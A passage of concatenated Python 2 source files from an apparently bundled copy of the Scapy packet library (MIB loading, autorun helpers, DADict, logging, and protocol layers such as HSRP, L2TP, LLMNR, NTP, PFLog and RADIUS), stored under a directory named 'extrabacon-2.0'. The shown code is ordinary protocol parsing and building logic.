the_mib, {}): 100 | del(unresolved[k]) 101 | del(keys[i]) 102 | i = 0 103 | else: 104 | i += 1 105 | 106 | return True 107 | 108 | 109 | def load_mib(filenames): 110 | the_mib = {'iso': ['1']} 111 | unresolved = {} 112 | for k in conf.mib.keys(): 113 | mib_register(k, conf.mib[k].split("."), the_mib, unresolved) 114 | 115 | if type(filenames) is str: 116 | filenames = [filenames] 117 | for fnames in filenames: 118 | for fname in glob(fnames): 119 | f = open(fname) 120 | text = f.read() 121 | cleantext = " ".join(_mib_re_strings.split(" ".join(_mib_re_comments.split(text)))) 122 | for m in _mib_re_oiddecl.finditer(cleantext): 123 | gr = m.groups() 124 | ident,oid = gr[0],gr[-1] 125 | ident=fixname(ident) 126 | oid = oid.split() 127 | for i in range(len(oid)): 128 | m = _mib_re_both.match(oid[i]) 129 | if m: 130 | oid[i] = m.groups()[1] 131 | mib_register(ident, oid, the_mib, unresolved) 132 | 133 | newmib = MIBDict(_name="MIB") 134 | for k,o in the_mib.iteritems(): 135 | newmib[k]=".".join(o) 136 | for k,o in unresolved.iteritems(): 137 | newmib[k]=".".join(o) 138 | 139 | conf.mib=newmib 140 | 141 | 142 | 143 | conf.mib = MIBDict(_name="MIB") 144 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/asn1packet.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from packet import * 7 | 8 | class ASN1_Packet(Packet): 9 | ASN1_root = None 10 | ASN1_codec = None 11 | def init_fields(self): 12 | flist = self.ASN1_root.get_fields_list() 13 | self.do_init_fields(flist) 14 | self.fields_desc = flist 15 | def do_build(self): 16 | return self.ASN1_root.build(self) 17 | def do_dissect(self, x): 18 | return self.ASN1_root.dissect(self, x) 19 | 20 | 21 | 
-------------------------------------------------------------------------------- /extrabacon-2.0/scapy/autorun.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | import code,sys 7 | from config import conf 8 | from themes import * 9 | from error import Scapy_Exception 10 | from utils import tex_escape 11 | 12 | 13 | ######################### 14 | ##### Autorun stuff ##### 15 | ######################### 16 | 17 | class StopAutorun(Scapy_Exception): 18 | code_run = "" 19 | 20 | class ScapyAutorunInterpreter(code.InteractiveInterpreter): 21 | def __init__(self, *args, **kargs): 22 | code.InteractiveInterpreter.__init__(self, *args, **kargs) 23 | self.error = 0 24 | def showsyntaxerror(self, *args, **kargs): 25 | self.error = 1 26 | return code.InteractiveInterpreter.showsyntaxerror(self, *args, **kargs) 27 | def showtraceback(self, *args, **kargs): 28 | self.error = 1 29 | exc_type, exc_value, exc_tb = sys.exc_info() 30 | if isinstance(exc_value, StopAutorun): 31 | raise exc_value 32 | return code.InteractiveInterpreter.showtraceback(self, *args, **kargs) 33 | 34 | 35 | def autorun_commands(cmds,my_globals=None,verb=0): 36 | sv = conf.verb 37 | import __builtin__ 38 | try: 39 | try: 40 | if my_globals is None: 41 | my_globals = __import__("scapy.all").all.__dict__ 42 | conf.verb = verb 43 | interp = ScapyAutorunInterpreter(my_globals) 44 | cmd = "" 45 | cmds = cmds.splitlines() 46 | cmds.append("") # ensure we finish multiline commands 47 | cmds.reverse() 48 | __builtin__.__dict__["_"] = None 49 | while 1: 50 | if cmd: 51 | sys.stderr.write(sys.__dict__.get("ps2","... 
")) 52 | else: 53 | sys.stderr.write(str(sys.__dict__.get("ps1",ColorPrompt()))) 54 | 55 | l = cmds.pop() 56 | print l 57 | cmd += "\n"+l 58 | if interp.runsource(cmd): 59 | continue 60 | if interp.error: 61 | return 0 62 | cmd = "" 63 | if len(cmds) <= 1: 64 | break 65 | except SystemExit: 66 | pass 67 | finally: 68 | conf.verb = sv 69 | return _ 70 | 71 | def autorun_get_interactive_session(cmds, **kargs): 72 | class StringWriter: 73 | def __init__(self): 74 | self.s = "" 75 | def write(self, x): 76 | self.s += x 77 | 78 | sw = StringWriter() 79 | sstdout,sstderr = sys.stdout,sys.stderr 80 | try: 81 | try: 82 | sys.stdout = sys.stderr = sw 83 | res = autorun_commands(cmds, **kargs) 84 | except StopAutorun,e: 85 | e.code_run = sw.s 86 | raise 87 | finally: 88 | sys.stdout,sys.stderr = sstdout,sstderr 89 | return sw.s,res 90 | 91 | def autorun_get_text_interactive_session(cmds, **kargs): 92 | ct = conf.color_theme 93 | try: 94 | conf.color_theme = NoTheme() 95 | s,res = autorun_get_interactive_session(cmds, **kargs) 96 | finally: 97 | conf.color_theme = ct 98 | return s,res 99 | 100 | def autorun_get_ansi_interactive_session(cmds, **kargs): 101 | ct = conf.color_theme 102 | try: 103 | conf.color_theme = DefaultTheme() 104 | s,res = autorun_get_interactive_session(cmds, **kargs) 105 | finally: 106 | conf.color_theme = ct 107 | return s,res 108 | 109 | def autorun_get_html_interactive_session(cmds, **kargs): 110 | ct = conf.color_theme 111 | to_html = lambda s: s.replace("<","<").replace(">",">").replace("#[#","<").replace("#]#",">") 112 | try: 113 | try: 114 | conf.color_theme = HTMLTheme2() 115 | s,res = autorun_get_interactive_session(cmds, **kargs) 116 | except StopAutorun,e: 117 | e.code_run = to_html(e.code_run) 118 | raise 119 | finally: 120 | conf.color_theme = ct 121 | 122 | return to_html(s),res 123 | 124 | def autorun_get_latex_interactive_session(cmds, **kargs): 125 | ct = conf.color_theme 126 | to_latex = lambda s: 
## ---- tail of extrabacon-2.0/scapy/autorun.py: the enclosing function starts before this chunk ----
tex_escape(s).replace("@[@","{").replace("@]@","}").replace("@`@","\\")
    try:
        try:
            conf.color_theme = LatexTheme2()
            s,res = autorun_get_interactive_session(cmds, **kargs)
        except StopAutorun,e:
            e.code_run = to_latex(e.code_run)
            raise
    finally:
        conf.color_theme = ct
    return to_latex(s),res



## ======== extrabacon-2.0/scapy/crypto/__init__.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Arnaud Ebalard
## This program is published under a GPLv2 license

# Public submodules of the scapy.crypto package.
__all__ = ["cert"]

## ======== extrabacon-2.0/scapy/dadict.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi
## This program is published under a GPLv2 license

from error import Scapy_Exception

###############################
## Direct Access dictionnary ##
###############################

def fixname(x):
    # Turn an arbitrary key into a usable attribute name: a leading digit
    # gets an "n_" prefix, and the 256-entry table below (Python 2
    # str.translate semantics) maps every character that is not
    # [0-9A-Za-z] to "_".
    if x and x[0] in "0123456789":
        x = "n_"+x
    return x.translate("________________________________________________0123456789_______ABCDEFGHIJKLMNOPQRSTUVWXYZ______abcdefghijklmnopqrstuvwxyz_____________________________________________________________________________________________________________________________________")


class DADict_Exception(Scapy_Exception):
    # Raised by DADict._branch() when uniq is set and the name is taken.
    pass

class DADict:
    # Dictionary whose entries are also instance attributes ("direct
    # access").  Keys starting with "_" (such as _name) are metadata and
    # are hidden from iteration, keys() and repr().
    def __init__(self, _name="DADict", **kargs):
        self._name=_name
        self.__dict__.update(kargs)
    def fixname(self,val):
        return fixname(val)
    def __contains__(self, val):
        return val in self.__dict__
    def __getitem__(self, attr):
        return getattr(self, attr)
    def __setitem__(self, attr, val):
        # The sanitized key is stored with setattr(), so a key that
        # sanitizes to an existing attribute name (e.g. "keys" or "_name")
        # shadows that method/field on this instance.
        return setattr(self, self.fixname(attr), val)
    def __iter__(self):
        # Iterates over the *values* of the non-underscore entries.
        return iter(map(lambda (x,y):y,filter(lambda (x,y):x and x[0]!="_", self.__dict__.items())))
    def _show(self):
        # Print every visible entry, one per line.
        for k in self.__dict__.keys():
            if k and k[0] != "_":
                print "%10s = %r" % (k,getattr(self,k))
    def __repr__(self):
        return "<%s/ %s>" % (self._name," ".join(filter(lambda x:x and x[0]!="_",self.__dict__.keys())))

    def _branch(self, br, uniq=0):
        # Attach the DADict *br* under its own _name; with uniq set,
        # refuse to overwrite an existing entry of that name.
        if uniq and br._name in self:
            raise DADict_Exception("DADict: [%s] already branched in [%s]" % (br._name, self._name))
        self[br._name] = br

    def _my_find(self, *args, **kargs):
        # True when this node's _name is among *args (if any were given)
        # and every kargs key exists here with an equal value.
        if args and self._name not in args:
            return False
        for k in kargs:
            if k not in self or self[k] != kargs[k]:
                return False
        return True

    def _find(self, *args, **kargs):
        # Depth-first search for the first matching node in the tree.
        return self._recurs_find((), *args, **kargs)
    def _recurs_find(self, path, *args, **kargs):
        # *path* holds the ancestors already visited and stops cycles
        # (no __eq__ is defined, so membership is effectively by identity).
        if self in path:
            return None
        if self._my_find(*args, **kargs):
            return self
        for o in self:
            if isinstance(o, DADict):
                p = o._recurs_find(path+(self,), *args, **kargs)
                if p is not None:
                    return p
        return None
    def _find_all(self, *args, **kargs):
        # Like _find() but collects every matching node.
        return self._recurs_find_all((), *args, **kargs)
    def _recurs_find_all(self, path, *args, **kargs):
        r = []
        if self in path:
            return r
        if self._my_find(*args, **kargs):
            r.append(self)
        for o in self:
            if isinstance(o, DADict):
                p = o._recurs_find_all(path+(self,), *args, **kargs)
                r += p
        return r
    def keys(self):
        # Visible (non-underscore) keys only.
        return filter(lambda x:x and x[0]!="_", self.__dict__.keys())

## ======== extrabacon-2.0/scapy/error.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi
## This program is published under a GPLv2 license


#############################
##### Logging subsystem #####
#############################

class Scapy_Exception(Exception):
    # Base class for exceptions raised by scapy itself.
    pass

import logging,traceback,time

class ScapyFreqFilter(logging.Filter):
    # Rate-limits repeated warnings from the same call site: within a
    # window of conf.warning_threshold seconds a site gets its first two
    # warnings through (the second prefixed with "more "), later ones are
    # dropped.  A threshold of 0 disables the filter.
    def __init__(self):
        logging.Filter.__init__(self)
        self.warning_table = {}   # caller line number -> (window start, count)
    def filter(self, record):
        from config import conf
        wt = conf.warning_threshold
        if wt > 0:
            stk = traceback.extract_stack()
            caller=None
            # "caller" is the line number of the frame just outside the
            # frame named 'warning'.  Only the line number is kept, so two
            # files warning from the same line number share one counter.
            for f,l,n,c in stk:
                if n == 'warning':
                    break
                caller = l
            tm,nb = self.warning_table.get(caller, (0,0))
            ltm = time.time()
            if ltm-tm > wt:
                # window expired: start a new one for this caller
                tm = ltm
                nb = 0
            else:
                if nb < 2:
                    nb += 1
                    if nb == 2:
                        record.msg = "more "+record.msg
                else:
                    return 0   # suppressed
            self.warning_table[caller] = (tm,nb)
        return 1

log_scapy = logging.getLogger("scapy")
console_handler = logging.StreamHandler()
console_handler.setFormatter(logging.Formatter("%(levelname)s: %(message)s"))
log_scapy.addHandler(console_handler)
log_runtime = logging.getLogger("scapy.runtime")          # logs at runtime
log_runtime.addFilter(ScapyFreqFilter())
log_interactive = logging.getLogger("scapy.interactive")  # logs in interactive functions
log_loading = logging.getLogger("scapy.loading")          # logs when loading scapy


def warning(x):
    # Emit a warning through the rate-limited "scapy.runtime" logger.
    log_runtime.warning(x)

## ======== extrabacon-2.0/scapy/layers/__init__.py ========
## This file is part of Scapy
## See
## (continued) http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi
## This program is published under a GPLv2 license

## ======== extrabacon-2.0/scapy/layers/all.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi
## This program is published under a GPLv2 license

from scapy.config import conf
from scapy.error import log_loading

def _import_star(m):
    # Emulate "from <m> import *" into this module: every name in the
    # layer module's __dict__ (no __all__ filtering, underscore names
    # included) is copied into globals(), overwriting earlier bindings.
    mod = __import__(m, globals(), locals())
    for k,v in mod.__dict__.iteritems():
        globals()[k] = v

# Load every layer named in conf.load_layers, in order; on a name clash
# the layer loaded last wins.
for _l in conf.load_layers:
    log_loading.debug("Loading layer %s" % _l)
    _import_star(_l)




## ======== extrabacon-2.0/scapy/layers/gprs.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi
## This program is published under a GPLv2 license


from scapy.fields import *
from scapy.packet import *
from scapy.layers.inet import IP

class GPRS(Packet):
    # Placeholder layer: a single StrStopField with stop marker
    # "\x65\x00\x00", presumably consuming the GPRS framing so the IP
    # packet bound below can be dissected.
    name = "GPRSdummy"
    fields_desc = [
        StrStopField("dummy","","\x65\x00\x00",1)
        ]


bind_layers( GPRS, IP, )

## ======== extrabacon-2.0/scapy/layers/hsrp.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi
## This program is published under a GPLv2 license

from scapy.fields
import *
from scapy.packet import *
from scapy.layers.inet import UDP

class HSRP(Packet):
    # Hot Standby Router Protocol hello (UDP/1985).  "auth" is an 8-byte
    # fixed-length string field (default "cisco"); nothing in this layer
    # hashes or signs it.
    name = "HSRP"
    fields_desc = [
        ByteField("version", 0),
        ByteEnumField("opcode", 0, { 0:"Hello"}),
        ByteEnumField("state", 16, { 16:"Active"}),
        ByteField("hellotime", 3),
        ByteField("holdtime", 10),
        ByteField("priority", 120),
        ByteField("group", 1),
        ByteField("reserved", 0),
        StrFixedLenField("auth","cisco",8),
        IPField("virtualIP","192.168.1.1") ]





bind_layers( UDP, HSRP, dport=1985, sport=1985)

## ======== extrabacon-2.0/scapy/layers/ir.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi
## This program is published under a GPLv2 license

from scapy.packet import *
from scapy.fields import *
from scapy.layers.l2 import CookedLinux



# IR

class IrLAPHead(Packet):
    # IrLAP frame header: 7-bit address plus a command/response bit.
    name = "IrDA Link Access Protocol Header"
    fields_desc = [ XBitField("Address", 0x7f, 7),
                    BitEnumField("Type", 1, 1, {"Response":0,
                                                "Command":1})]

class IrLAPCommand(Packet):
    # Body of an IrLAP command frame (bound below for Type=1).
    name = "IrDA Link Access Protocol Command"
    fields_desc = [ XByteField("Control", 0),
                    XByteField("Format identifier", 0),
                    XIntField("Source address", 0),
                    XIntField("Destination address", 0xffffffffL),
                    XByteField("Discovery flags", 0x1),
                    ByteEnumField("Slot number", 255, {"final":255}),
                    XByteField("Version", 0)]


class IrLMP(Packet):
    # IrLMP payload carried after an IrLAP command.
    name = "IrDA Link Management Protocol"
    fields_desc = [ XShortField("Service hints", 0),
                    XByteField("Character set", 0),
                    StrField("Device name", "") ]


bind_layers( CookedLinux, IrLAPHead, proto=23)
bind_layers(
IrLAPHead, IrLAPCommand, Type=1)
bind_layers( IrLAPCommand, IrLMP, )

## ======== extrabacon-2.0/scapy/layers/l2tp.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi
## This program is published under a GPLv2 license

import struct

from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import UDP
from scapy.layers.ppp import PPP

class L2TP(Packet):
    # L2TP data message header (UDP/1701).  "len" defaults to None so
    # that post_build() fills in the total length at build time.
    fields_desc = [ ShortEnumField("pkt_type",2,{2:"data"}),
                    ShortField("len", None),
                    ShortField("tunnel_id", 0),
                    ShortField("session_id", 0),
                    ShortField("ns", 0),
                    ShortField("nr", 0),
                    ShortField("offset", 0) ]

    def post_build(self, pkt, pay):
        # Patch bytes 2-3 (the "len" field) with header+payload length
        # unless the caller set it explicitly.  struct.pack("!H") raises
        # struct.error if that length exceeds 65535.
        if self.len is None:
            l = len(pkt)+len(pay)
            pkt = pkt[:2]+struct.pack("!H", l)+pkt[4:]
        return pkt+pay


bind_layers( UDP, L2TP, sport=1701, dport=1701)
bind_layers( L2TP, PPP, )

## ======== extrabacon-2.0/scapy/layers/llmnr.py ========
from scapy.fields import *
from scapy.packet import *
from scapy.layers.inet import UDP
from scapy.layers.dns import DNSQRField, DNSRRField, DNSRRCountField


#############################################################################
###                          LLMNR (RFC4795)                              ###
#############################################################################
# LLMNR is based on the DNS packet format (RFC1035 Section 4)
# RFC also envisions LLMNR over TCP.
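# Like vista, we don't support it -- arno

_LLMNR_IPv6_mcast_Addr = "FF02:0:0:0:0:0:1:3"
_LLMNR_IPv4_mcast_addr = "224.0.0.252"

class LLMNRQuery(Packet):
    # LLMNR query, same wire layout as a DNS message: a 16-bit id, then a
    # flags byte whose most significant bit is "qr" (0 = query), the rest
    # of the flags, the four section counts and the sections themselves.
    name = "Link Local Multicast Node Resolution - Query"
    fields_desc = [ ShortField("id", 0),
                    BitField("qr", 0, 1),
                    BitEnumField("opcode", 0, 4, { 0:"QUERY" }),
                    BitField("c", 0, 1),
                    BitField("tc", 0, 2),
                    BitField("z", 0, 4),
                    BitEnumField("rcode", 0, 4, { 0:"ok" }),
                    DNSRRCountField("qdcount", None, "qd"),
                    DNSRRCountField("ancount", None, "an"),
                    DNSRRCountField("nscount", None, "ns"),
                    DNSRRCountField("arcount", None, "ar"),
                    DNSQRField("qd", "qdcount"),
                    DNSRRField("an", "ancount"),
                    DNSRRField("ns", "nscount"),
                    DNSRRField("ar", "arcount",0)]
    overload_fields = {UDP: {"sport": 5355, "dport": 5355 }}
    def hashret(self):
        # Responses are matched to queries on the 16-bit id alone.
        # (struct is not imported by this file; it presumably arrives via
        # the star imports above -- TODO confirm.)
        return struct.pack("!H", self.id)

class LLMNRResponse(LLMNRQuery):
    # Same layout as the query, with qr set.
    name = "Link Local Multicast Node Resolution - Response"
    qr = 1
    fields_desc = []

    def answers(self, other):
        # A response answers a query carrying the same id; qr must be set
        # on this side and clear on the other.
        return (isinstance(other, LLMNRQuery) and
                self.id == other.id and
                self.qr == 1 and
                other.qr == 0)

def _llmnr_dispatcher(x, *args, **kargs):
    """Choose LLMNRQuery or LLMNRResponse for the raw UDP payload *x*.

    The qr flag is the most significant bit of byte 2 (bytes 0-1 are the
    id, see LLMNRQuery.fields_desc).  The original code tested byte 4 --
    the high byte of qdcount -- which classified ordinary responses as
    queries and, because the guard only required 3 bytes, raised
    IndexError on 3- and 4-byte payloads received from the network.
    Payloads shorter than 3 bytes are left as Raw.
    """
    cls = Raw
    if len(x) >= 3:
        if (ord(x[2]) & 0x80): # Response
            cls = LLMNRResponse
        else:                  # Query
            cls = LLMNRQuery
    return cls(x, *args, **kargs)

bind_bottom_up(UDP, _llmnr_dispatcher, { "dport": 5355 })
bind_bottom_up(UDP, _llmnr_dispatcher, { "sport": 5355 })

# LLMNRQuery(id=RandShort(), qd=DNSQR(qname="vista.")))


## ======== extrabacon-2.0/scapy/layers/mgcp.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi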
## This program is published under a GPLv2 license

from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import UDP

class MGCP(Packet):
    # Text-based MGCP command line (UDP/2727): verb, transaction id,
    # endpoint and version as stop-delimited strings, each followed by an
    # explicit one-byte separator field.
    name = "MGCP"
    longname = "Media Gateway Control Protocol"
    fields_desc = [ StrStopField("verb","AUEP"," ", -1),
                    StrFixedLenField("sep1"," ",1),
                    StrStopField("transaction_id","1234567"," ", -1),
                    StrFixedLenField("sep2"," ",1),
                    StrStopField("endpoint","dummy@dummy.net"," ", -1),
                    StrFixedLenField("sep3"," ",1),
                    StrStopField("version","MGCP 1.0 NCS 1.0","\x0a", -1),
                    StrFixedLenField("sep4","\x0a",1),
                    ]


# Earlier binary-style definition, kept by the author for reference.
#class MGCP(Packet):
#    name = "MGCP"
#    longname = "Media Gateway Control Protocol"
#    fields_desc = [ ByteEnumField("type",0, ["request","response","others"]),
#                    ByteField("code0",0),
#                    ByteField("code1",0),
#                    ByteField("code2",0),
#                    ByteField("code3",0),
#                    ByteField("code4",0),
#                    IntField("trasid",0),
#                    IntField("req_time",0),
#                    ByteField("is_duplicate",0),
#                    ByteField("req_available",0) ]
#
bind_layers( UDP, MGCP, dport=2727)
bind_layers( UDP, MGCP, sport=2727)

## ======== extrabacon-2.0/scapy/layers/mobileip.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi
## This program is published under a GPLv2 license

from scapy.fields import *
from scapy.packet import *
from scapy.layers.inet import IP,UDP


class MobileIP(Packet):
    # One-byte message type (UDP/434).  The enum names only 1 and 3, so
    # the tunnel-data type 4 bound further down is displayed as a bare
    # number.
    name = "Mobile IP (RFC3344)"
    fields_desc = [ ByteEnumField("type", 1, {1:"RRQ", 3:"RRP"}) ]

class MobileIPRRQ(Packet):
    # Registration Request body.
    name = "Mobile IP Registration Request (RFC3344)"
    fields_desc = [ XByteField("flags", 0),
ShortField("lifetime", 180),
                    IPField("homeaddr", "0.0.0.0"),
                    IPField("haaddr", "0.0.0.0"),
                    IPField("coaddr", "0.0.0.0"),
                    LongField("id", 0), ]

class MobileIPRRP(Packet):
    # Registration Reply body: same as the request minus the care-of
    # address, plus a result code.
    name = "Mobile IP Registration Reply (RFC3344)"
    fields_desc = [ ByteField("code", 0),
                    ShortField("lifetime", 180),
                    IPField("homeaddr", "0.0.0.0"),
                    IPField("haaddr", "0.0.0.0"),
                    LongField("id", 0), ]

class MobileIPTunnelData(Packet):
    # Tunnel data message; nexthdr=4 chains into an inner IP packet.
    name = "Mobile IP Tunnel Data Message (RFC3519)"
    fields_desc = [ ByteField("nexthdr", 4),
                    ShortField("res", 0) ]


bind_layers( UDP, MobileIP, sport=434)
bind_layers( UDP, MobileIP, dport=434)
bind_layers( MobileIP, MobileIPRRQ, type=1)
bind_layers( MobileIP, MobileIPRRP, type=3)
bind_layers( MobileIP, MobileIPTunnelData, type=4)
bind_layers( MobileIPTunnelData, IP, nexthdr=4)

## ======== extrabacon-2.0/scapy/layers/netflow.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi
## This program is published under a GPLv2 license

from scapy.fields import *
from scapy.packet import *

# Cisco Netflow Protocol version 1
class NetflowHeader(Packet):
    # Common two-byte version prefix; version=1 chains into NetflowHeaderV1.
    name = "Netflow Header"
    fields_desc = [ ShortField("version", 1) ]

class NetflowHeaderV1(Packet):
    # Remainder of the v1 export header.  "count" is a plain field here;
    # nothing ties it to the number of records that follow.
    name = "Netflow Header V1"
    fields_desc = [ ShortField("count", 0),
                    IntField("sysUptime", 0),
                    IntField("unixSecs", 0),
                    IntField("unixNanoSeconds", 0) ]


class NetflowRecordV1(Packet):
    # One v1 flow record.
    name = "Netflow Record"
    fields_desc = [ IPField("ipsrc", "0.0.0.0"),
                    IPField("ipdst", "0.0.0.0"),
                    IPField("nexthop", "0.0.0.0"),
                    ShortField("inputIfIndex", 0),
ShortField("outpuIfIndex", 0),   # sic: field name typo is part of the API, do not rename
                    IntField("dpkts", 0),
                    IntField("dbytes", 0),
                    IntField("starttime", 0),
                    IntField("endtime", 0),
                    ShortField("srcport", 0),
                    ShortField("dstport", 0),
                    ShortField("padding", 0),
                    ByteField("proto", 0),
                    ByteField("tos", 0),
                    IntField("padding1", 0),
                    IntField("padding2", 0) ]


bind_layers( NetflowHeader, NetflowHeaderV1, version=1)
bind_layers( NetflowHeaderV1, NetflowRecordV1, )

## ======== extrabacon-2.0/scapy/layers/ntp.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi
## This program is published under a GPLv2 license

import time
from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import UDP


# seconds between 01-01-1900 and 01-01-1970
_NTP_BASETIME = 2208988800

class TimeStampField(FixedPointField):
    # 64-bit NTP timestamp: 32.32 fixed point, seconds since 1900.
    def __init__(self, name, default):
        FixedPointField.__init__(self, name, default, 64, 32)

    def i2repr(self, pkt, val):
        if val is None:
            return "--"
        val = self.i2h(pkt,val)
        if val < _NTP_BASETIME:
            # earlier than the Unix epoch: show the raw value
            return val
        return time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime(val-_NTP_BASETIME))

    def any2i(self, pkt, val):
        # A str is parsed with strptime()'s default format and converted
        # with the local-time mktime(); the "+ 3600" is an unexplained
        # one-hour adjustment the author marked XXX -- presumably a
        # timezone hack, so string input should not be relied upon.
        if type(val) is str:
            return int(time.mktime(time.strptime(val))) + _NTP_BASETIME + 3600 # XXX
        return FixedPointField.any2i(self,pkt,val)

    def i2m(self, pkt, val):
        # None means "now": stamp with the current time at build time.
        if val is None:
            val = FixedPointField.any2i(self, pkt, time.time()+_NTP_BASETIME)
        return FixedPointField.i2m(self, pkt, val)



class NTP(Packet):
    # RFC 1769
    name = "NTP"
    fields_desc = [
         BitEnumField('leap', 0, 2,
                      { 0: 'nowarning',
                        1:
'longminute',
                        2: 'shortminute',
                        3: 'notsync'}),
         BitField('version', 3, 3),
         BitEnumField('mode', 3, 3,
                      { 0: 'reserved',
                        1: 'sym_active',
                        2: 'sym_passive',
                        3: 'client',
                        4: 'server',
                        5: 'broadcast',
                        6: 'control',
                        7: 'private'}),
         BitField('stratum', 2, 8),
         BitField('poll', 0xa, 8),         ### XXX : it's a signed int
         BitField('precision', 0, 8),      ### XXX : it's a signed int
         FixedPointField('delay', 0, size=32, frac_bits=16),
         FixedPointField('dispersion', 0, size=32, frac_bits=16),
         IPField('id', "127.0.0.1"),
         TimeStampField('ref', 0),
         TimeStampField('orig', None),     # None means current time
         TimeStampField('recv', 0),
         TimeStampField('sent', None)
         ]
    def mysummary(self):
        # One-line summary: protocol version and mode.
        return self.sprintf("NTP v%ir,NTP.version%, %NTP.mode%")


bind_layers( UDP, NTP, dport=123, sport=123)

## ======== extrabacon-2.0/scapy/layers/pflog.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi
## This program is published under a GPLv2 license

from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import IP
# NOTE(review): "conf" is tested here before the explicit
# "from scapy.config import conf" below, and "socket" is never imported
# explicitly in this file; both presumably arrive through the star
# imports above -- confirm before reordering these lines.
if conf.ipv6_enabled:
    from scapy.layers.inet6 import IPv6
from scapy.config import conf

class PFLog(Packet):
    # OpenBSD pf log record (link-layer type 117, registered at the end
    # of this file).  The address family selects IP or IPv6 as payload.
    name = "PFLog"
    # from OpenBSD src/sys/net/pfvar.h and src/sys/net/if_pflog.h
    fields_desc = [ ByteField("hdrlen", 0),
                    ByteEnumField("addrfamily", 2, {socket.AF_INET: "IPv4",
                                                    socket.AF_INET6: "IPv6"}),
                    ByteEnumField("action", 1, {0: "pass", 1: "drop",
                                                2: "scrub", 3: "no-scrub",
                                                4: "nat", 5: "no-nat",
                                                6: "binat", 7: "no-binat",
                                                8: "rdr", 9: "no-rdr",
                                                10: "syn-proxy-drop" }),
ByteEnumField("reason", 0, {0: "match", 1: "bad-offset",
                                                2: "fragment", 3: "short",
                                                4: "normalize", 5: "memory",
                                                6: "bad-timestamp",
                                                7: "congestion",
                                                8: "ip-options",
                                                9: "proto-cksum",
                                                10: "state-mismatch",
                                                11: "state-insert",
                                                12: "state-limit",
                                                13: "src-limit",
                                                14: "syn-proxy" }),
                    StrFixedLenField("iface", "", 16),
                    StrFixedLenField("ruleset", "", 16),
                    SignedIntField("rulenumber", 0),
                    SignedIntField("subrulenumber", 0),
                    SignedIntField("uid", 0),
                    IntField("pid", 0),
                    SignedIntField("ruleuid", 0),
                    IntField("rulepid", 0),
                    ByteEnumField("direction", 255, {0: "inout", 1: "in",
                                                     2:"out", 255: "unknown"}),
                    StrFixedLenField("pad", "\x00\x00\x00", 3 ) ]
    def mysummary(self):
        # One-line summary: family, action, interface and matching rule.
        return self.sprintf("%PFLog.addrfamily% %PFLog.action% on %PFLog.iface% by rule %PFLog.rulenumber%")

bind_layers(PFLog, IP, addrfamily=socket.AF_INET)
if conf.ipv6_enabled:
    bind_layers(PFLog, IPv6, addrfamily=socket.AF_INET6)

conf.l2types.register(117, PFLog)

## ======== extrabacon-2.0/scapy/layers/radius.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi
## This program is published under a GPLv2 license

import struct
from scapy.packet import *
from scapy.fields import *

class Radius(Packet):
    # RADIUS packet header only: code, id, length and the 16-byte
    # authenticator.  Attributes are carried as payload and are not
    # dissected by this layer.
    name = "Radius"
    fields_desc = [ ByteEnumField("code", 1, {1: "Access-Request",
                                              2: "Access-Accept",
                                              3: "Access-Reject",
                                              4: "Accounting-Request",
                                              5: "Accounting-Accept",
                                              6: "Accounting-Status",
                                              7: "Password-Request",
                                              8: "Password-Ack",
                                              9: "Password-Reject",
                                              10: "Accounting-Message",
                                              11: "Access-Challenge",
                                              12: "Status-Server",
13: "Status-Client",
                                              21: "Resource-Free-Request",
                                              22: "Resource-Free-Response",
                                              23: "Resource-Query-Request",
                                              24: "Resource-Query-Response",
                                              25: "Alternate-Resource-Reclaim-Request",
                                              26: "NAS-Reboot-Request",
                                              27: "NAS-Reboot-Response",
                                              29: "Next-Passcode",
                                              30: "New-Pin",
                                              31: "Terminate-Session",
                                              32: "Password-Expired",
                                              33: "Event-Request",
                                              34: "Event-Response",
                                              40: "Disconnect-Request",
                                              41: "Disconnect-ACK",
                                              42: "Disconnect-NAK",
                                              43: "CoA-Request",
                                              44: "CoA-ACK",
                                              45: "CoA-NAK",
                                              50: "IP-Address-Allocate",
                                              51: "IP-Address-Release",
                                              253: "Experimental-use",
                                              254: "Reserved",
                                              255: "Reserved"} ),
                    ByteField("id", 0),
                    ShortField("len", None),
                    StrFixedLenField("authenticator","",16) ]
    def post_build(self, p, pay):
        # Append the payload and, when "len" was left None, write the
        # total packet length into bytes 2-3.  Nothing here computes the
        # authenticator; it is emitted exactly as the caller set it.
        p += pay
        l = self.len
        if l is None:
            l = len(p)
